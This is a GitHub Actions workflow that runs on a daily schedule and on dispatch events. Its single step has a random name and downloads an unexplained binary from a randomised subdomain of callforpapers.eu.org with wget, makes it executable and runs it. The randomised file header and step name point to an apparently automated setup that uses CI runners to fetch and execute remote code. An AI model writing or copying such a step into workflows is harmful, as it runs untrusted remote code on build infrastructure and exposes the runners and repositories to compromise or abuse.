#2024-03-18-[083359]-u1xr6gdq
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "24 1 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 3k8abw12la8ymw5c
        run: |
          wget -q https://jzoeyhbgkjt0aa3s.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories